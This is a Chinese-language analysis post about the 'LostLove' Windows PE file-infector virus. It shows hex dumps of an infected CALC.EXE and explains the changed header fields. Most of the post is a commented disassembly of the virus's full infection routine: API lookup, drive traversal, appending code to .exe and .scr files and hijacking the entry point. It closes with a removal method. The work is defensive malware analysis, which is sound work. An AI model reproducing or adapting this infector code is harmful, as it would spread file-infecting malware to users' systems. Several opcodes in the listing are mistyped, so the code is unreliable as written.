以前曾经分析过一个小病毒,贴出来共享:
1、LostLove病毒,该病毒的特征是感染扩展名为
EXE和SCR的Windows的PE文件,文件长度增加1186字节。
病毒发作时会查找C—Z盘所有符合条件的文件,并将其感
染,同时会打开 http://www.wx-packs.com/lx/boy/boyhacker.htm
页面,不会造成其他的破坏。
2、感染数据
以被感染的 C:\WINDOWS\CALC.EXE 为例,正常为94,208字节,
感染后为95,394字节。
感染前:
00 01 02 03 04 05 06 07-08 09 0A 0B 0C 0D 0E 0F 0123456789ABCDEF
0000 4D 5A 90 00 03 00 00 00-04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00-00 00 00 00 C8 00 00 00 ................
00C0 50 45 00 00 4C 01 03 00 PE..L...
00D0 B4 AF FD 34 00 00 00 00-00 00 00 00 E0 00 0F 03 ...4............
00E0 0B 01 05 0C 00 1C 01 00-00 38 00 00 00 00 00 00 .........8......
00F0 E0 19 01 00 00 10 00 00-00 30 01 00 00 00 00 01 .........0......
0100 00 10 00 00 00 10 00 00-05 00 00 00 05 00 00 00 ................
0110 04 00 00 00 00 00 00 00-00 70 01 00 00 06 00 00 .........p......
0120 90 B7 01 00 02 00 00 00-00 00 04 00 00 10 00 00 ................
0130 00 00 10 00 00 10 00 00-00 00 00 00 10 00 00 00 ................
0140 00 00 00 00 00 00 00 00-20 20 01 00 8C 00 00 00 ........ ......
0150 00 40 01 00 18 26 00 00-00 00 00 00 00 00 00 00 .@...&..........
0160 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0170 F0 11 00 00 1C 00 00 00-00 00 00 00 00 00 00 00 ................
0180 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0190 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
01A0 00 10 00 00 E8 01 00 00-00 00 00 00 00 00 00 00 ................
01B0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
01C0 2E 74 65 78 74 00 00 00-0E 1A 01 00 00 10 00 00 .text...........
01D0 00 20 01 00 00 10 00 00-00 00 00 00 00 00 00 00 . ..............
01E0 00 00 00 00 20 00 00 60-2E 64 61 74 61 00 00 00 .... ..`.data...
01F0 84 0F 00 00 00 30 01 00-00 10 00 00 00 30 01 00 .....0.......0..
0200 00 00 00 00 00 00 00 00-00 00 00 00 40 00 00 C0 ............@...
0210 2E 72 73 72 63 00 00 00-18 26 00 00 00 40 01 00 .rsrc....&...@..
0220 00 30 00 00 00 40 01 00-00 00 00 00 00 00 00 00 .0...@..........
0230 00 00 00 00 40 00 00 40-00 00 00 00 00 00 00 00 ....@..@........
0240 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0250 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
感染后:
00 01 02 03 04 05 06 07-08 09 0A 0B 0C 0D 0E 0F 0123456789ABCDEF
00F0 00 70 01 00 .p..
0110 00 80 01 00 ....
0120 A2 04 00 00 ....
0210 A2 34 00 00 .4..
0220 A2 34 00 00 .4..
0230 40 00 00 E0 @...
比较一下:
地址 感染前 感染后
00F0: E0 00
00F1: 19 70
0119: 70 80
0120: 90 A2
0121: B7 04
0122: 01 00
0218: 18 A2
0219: 26 34
0220: 00 A2
0221: 30 34
0237: 40 E0
其中00F0-00F3为程序入口地址,感染前为000119E0,感染后为00017000
0118-011B为所有section大小,增加了1000
0120-0123为检验和,改为4A2
0218-021B为最后一个section的VirtualSize,增加了E8A
0220-0223为最后一个section的长度,增加了4A2
0234-0237为最后一个section的属性,该为读、写、执行3种权限
可见,病毒在最后一个section的后面,然后修改了入口地址和相应的section大小等,
最重要的是恢复程序入口地址。
3、病毒代码
将最后1186字节读出,进行反汇编,得如下代码:
;************** 原程序入口 ***********************
010119E0 PUSH BP
....
;************** 病毒入口 *************************
01017000 PUSHAD
CALL 01017010
MOV ESP,FS:[0000]
JMP [ESP+28]
01017010 PUSH WORD PTR FS:[0000]
MOV FS:[0000],ESP
MOV EAX,DWORD PTR [ESP+28]
AND AX,F000
MOV ESI,EAX
01017026 SUB ESI,00001000
CMP WORD PTR [ESI],5A4D ;查找 '4D5A' 即应用程序标志
JNE 01017026
MOVZX EDI,WORD PTR [ESI+3C]
ADD EDI,ESI
CMP WORD PTR [EDI],4550 ;查找 '4550' 即PE程序标志
JNE 01017026
MOV EBP,DWORD PTR [EDI+78]
ADD EBP,ESI
MOV EBX,DWORD PTR [EBP+20]
ADD EBX,ESI
XOR AX,AX
MOV EDX,ESI
0101704E ADD EBX,00000004
INC EAX
MOV EDI,DWORD PTR [EBX]
ADD EDI,EDX
01017056 CALL 0101706A
0101705B DB 'GetProcAddress',0
0101706A POP ESI
XOR ECX,ECX
MOV CL,0F
CLD
REPZ CMPSB ;查找GetProcAddress的入口地址
JNE 0101704E
MOV ESI,EDX
MOV EBX,DWORD PTR [EBP+24]
ADD EBX,ESI
MOVZX ECX, WORD PTR [EBX+2*EAX]
MOV EBX,DWORD PTR [EBP+1C]
ADD EBX,ESI
MOV EBX,DWORD PTR [EBX+4*ECX]
ADD EBX,ESI
SUB ESP,00000060
MOV EDI,ESP
CALL 0101709F
01017093 DB 'ExitProcess',0
0101709F CALL 010170BB
010170A4 DB 'RegisterServiceProcess',0
010170BB CALL 010170C6
010170C0 DB 'Sleep',0
010170C6 CALL 010170D3
010170CB DB '_lclose',0
010170D3 CALL 010170E0
010170D8 DB '_llseek',0
010170E0 CALL 010170ED
010170E5 DB '_lwrite',0
010170ED CALL 010170F9
010170F2 DB '_lread',0
010170F9 CALL 01017105
010170FE DB '_lopen',0
01017105 CALL 01017116
0101710A DB 'SetFileTime',0
01017116 CALL 0101712E
0101711B DB 'SetFileAttributesA',0
0101712E CALL 0101713D
01017133 DB 'FindClose',0
0101713D CALL 01017150
01017142 DB 'FindNextFileA',0
01017150 CALL 01017164
01017155 DB 'FindFirstFileA',0
01017164 CALL 0101717E
01017169 DB 'SetCurrentDirectoryA',0
0101717E CALL 01017191
01017183 DB 'GetDriveTypeA',0
01017191 CALL 0101719E
01017196 DB 'WinExec',0
0101719E CALL 010171B3
010171A3 DB 'GetCommandLineA',0
010171B3 CALL 010171C5
010171B8 DB 'GetLastError',0
010171C5 CALL 010171D7
010171CA DB 'CreateMutexA',0
010171D7 CALL 010171E9
010171DC DB 'LoadLibraryA',0
010171E9 MOV ECX,00000014
010171EE MOV EBP,ECX
PUSH ESI
CALL EBX ;调用GetProcAddress
CLD
STOSD
MOV ECX,EBP
LOOP 010171EE ;查找所需要使用的函数入口
MOV ESI,ESP ;函数就是上面的20个
CALL 01017209
01017200 DB 'LostLove',0 ;病毒标志
01017209 PUSH 0
PUSH 0
CALL [ESI+4] ;CreateMutexA
CALL [ESI+8] ;GetLastError
OR EAX,EAX
01017215 JE 0101722B ;成功,说明病毒未驻留,转病毒程序
01017217 MOV ESP,FS:[0000]
POP WORD PTR FS:[0000]
POP EAX
POPAD
01017225 PUSH 010119E0
0101722A RET ;返回原程序
;---------------------------------------
0101722B CALL [ESI+0C] ;GetCommandLineA
PUSH 00000001
PUSH EAX
CALL [ESI+10] ;WinExec 'Command Line'
MOV EAX,DWORD PTR [ESI+48]
OR EAX,EAX
JE 01017241
0101723B PUSH 00000001
PUSH 00000000
CALL EAX ;RegisterServiceProcess
01017241 CALL 01017289
01017246 PUSH 00000001
CALL 01017283
0101724D DB 'Explorer http://www.wx-packs.com/lx/boy/boyhacker.htm',0
01017283 CALL [ESI+10] ;WinExec
CALL [ESI+4C] ;ExitProcess
01017289 MOV ECX,00000018
MOV EDX,005C3A43 ;'C:\'
01017293 PUSH ECX
PUSH EDX
PUSH ESP
CALL [ESI+14] ;GetDriveTypeA
CMP EAX,2
JB 010172A9 ;只找固定磁盘
CMP EAX,5 ;光盘软盘不感兴趣
010172A1 JE 010172A9
PUSH ESP
CALL 010172AF
010172A9 POP EDX
INC EDX
POP ECX
LOOP 01017293
RET
010172AF ENTER 0000,00
PUSH EBX
PUSH ESI
PUSH EDI
PUSH [EBP+08]
CALL [ESI+18] ;SetCurrentDirectoryA
OR EAX,EAX
JE 0101731B ;出错
SUB ESP,00001000
MOV DWORD PTR [ESP],002A2E2A ;'*.*'
MOV EAX,ESP
PUSH ESP
PUSH EAX
CALL [ESI+1C] ;FindFirstFileA
MOV EBX,EAX
CMP EAX,FFFFFFFF
JE 0101730A
PUSH ESP
PUSH EBX
CALL [ESI+20] ;FindNextFileA
OR EAX,EAX
JE 01017306
LEA DX,DWORD PTR [ESP+2C]
MOV EAX,DWORD PTR [ESP]
AND EAX,00000010
JE 010172FE
MOV EAX,DWORD PTR[EDX]
CMP AL,2E
JE 010172DB
PUSH EDX
CALL 010172AF
JMP 010172DB
010172FE PUSH ESP
CALL 01017322
JMP 010172DB
01017306 PUSH EBX
CALL [ESI+24] ;FindClose
0101730A MOV DWORD PTR [ESP],00002E2E
PUSH ESP
CALL [ESI+18] ;SetCurrentDirectoryA
ADD ESP,00001000
0101731B POP EDI
POP ESI
POP EBX
LEAVE
RET 0004
01017322 ENTER 0000,00
PUSH EBX
PUSH ESI
PUSH EDI
MOV EBX,DWORD PTR [EBP+8]
MOV ECX,00001000
LEA EDI,DWORD PTR [EBX+2C]
XOR AL,AL
CLD
REPNZ SCASB ;得到扩展名
MOV EAX,DWORD PTR [EDI-05]
OR EAX,20202000
CMP EAX,6578652E ;'.exe'
JE 01017356
CMP EAX,7263732E ;'.scr'
JE 01017356
POP EDI
POP ESI
POP EBX
LEAVE
RET 0004
01017356 PUSH EBX
CALL 01017363
POP EDI
POP ESI
POP EBX
LEAVE
RET 0004
;**************** 感染过程在这儿 *******************************
01017363 ENTER 0000,00
PUSH EBX
PUSH ESI
PUSH EDI
MOV EDI,DWORD PTR [EBP+08]
LEA EBX,DWORD PTR [EDI+2C]
PUSH 00000000
PUSH EBX
CALL [ESI+28] ;SetFileAttributesA
PUSH 00000002 ;读写方式
PUSH EBX
CALL [ESI+30] ;_lopen 打开文件
CMP EAX,FFFFFFFF
JE 0101739D ;出错
MOV EBX,EAX
PUSH EBX
CALL 010173AD
LEA EAX,DWORD PTR [EDI+04]
LEA ECX,DWORD PTR [EDI+0C]
LEA EDX,DWORD PTR [EDI+14]
PUSH EDX
PUSH ECX
PUSH EAX
PUSH EBX
CALL [ESI+2C] ;SetFileTime 怪不得文件日期没有变化
PUSH EBX
CALL [ESI+40] ;_lclose
0101739D LEA BX,DWORD PTR [EDI+2C]
PUSH DWORD PTR [EDI]
PUSH EBX
CALL [ESI+28] ;SetFileAttributesA
POP EDI
POP ESI
POP EBX
LEAVE
RET 0004
010173AD ENTER 0000,00
PUSH EBX
PUSH ESI
PUSH EDI
SUB ESP,00001000
MOV EDI,ESP
PUSH 00001000 ;读4096字节
PUSH EDI ;地址
PUSH [EBP+08] ;文件号
CALL [ESI+34] ;_hread
MOVZX EAX,WORD PTR [EDI+3C]
ADD EDI,EAX
CMP EDI,EDP
JA 01017495
CMP WORD PTR [EDI],4550 ;是否真的是PE文件?
JNE 01017495
MOV EAX,000004A2
XCNH DWORD PTR [EDI+58],EAX
CMP EAX,000004A2 ;校验和是否为4A2,见下文说明
JE 01017495
LEA EBX,DWORD PTR [EDI+000000F8] ;第一个section header的地址
MOVZX ECX,WORD PTR [EDI+6] ;section的数目
DEC ECX
010173FF ADD EBX,00000028
LOOP 010173FF ;找到最后一个section header
CMP EBX,EBP
JA 01017495
OR DWORD PTR [EBX+24],E0000000 ;修改其属性
PUSH 00000002 ;从末尾
PUSH 00000000 ;
PUSH [EBP+8]
CALL [ESI+3C] ;_llseek
CMP EAX,FFFFFFFF
JE 01017495
PUSH EAX
ADD EAX,000004A2
SUB EAX,DWORD PTR [EBX+14]
MOV DWORD PTR [EBX+10],EAX ;最后一个section的大小
MOV EDX,DWORD PTR [EBX+8]
CMP EAX,EDX
JB 0101744B
MOV DWORD PTR [EBX+8],EAX
MOV ECX,DWORD PTR [EDI+38]
DEC CX
ADD EAX,ECX
ADD EDX,ECX
NOT ECX
AND EAX,ECX
AND EDX,ECX
SUB EAX,EDX
ADD DWORD PTR [EDI+50],EAX ;SizeOfImage
0101744B POP ECX
SUB ECX,DWORD PTR [EBX+14] ;PointerToRawData
ADD ECX,DWORD PTR [EBX+0C] ;VirtualAddress
XCHG DWORD PTR [EDI+28],ECX ; !!!!!修改入口地址!!!!!
ADD ECX,DWORD PTR [EDI+34] ; 原入口地址加ImageBase放入ECX
CALL 0101745D
0101745D POP EDI
SUB EDI,00000237
MOV DWORD PTR [EDI],ECX ;把ECX放到这儿了
SUB EDI,00000226
PUSH 000004A2
PUSH EDI
PUAH [EBP+08]
CALL [ESI+38] ;_hwrite
CMP EAX,FFFFFFFF
JE 01017495
PUSH 00000000 ;到文件头
PUSH 00000000
PUSH [EBP+08]
CALL [ESI+3C] ;_llseek
MOV EAX,ESP
PUSH 00001000
PUSH EAX
PUSH [EBP+08]
CALL [ESI+38] ;_hwrite
01017495 ADD ESP,00001000
POP EDI
POP ESI
POP EBX
LEAVE
RET 0004
4、清除方法:
从上面程序就可以得到清除的方法,从文件最后倒数027C-0279字节得到的数减去ImageBase
就是原来的入口地址。
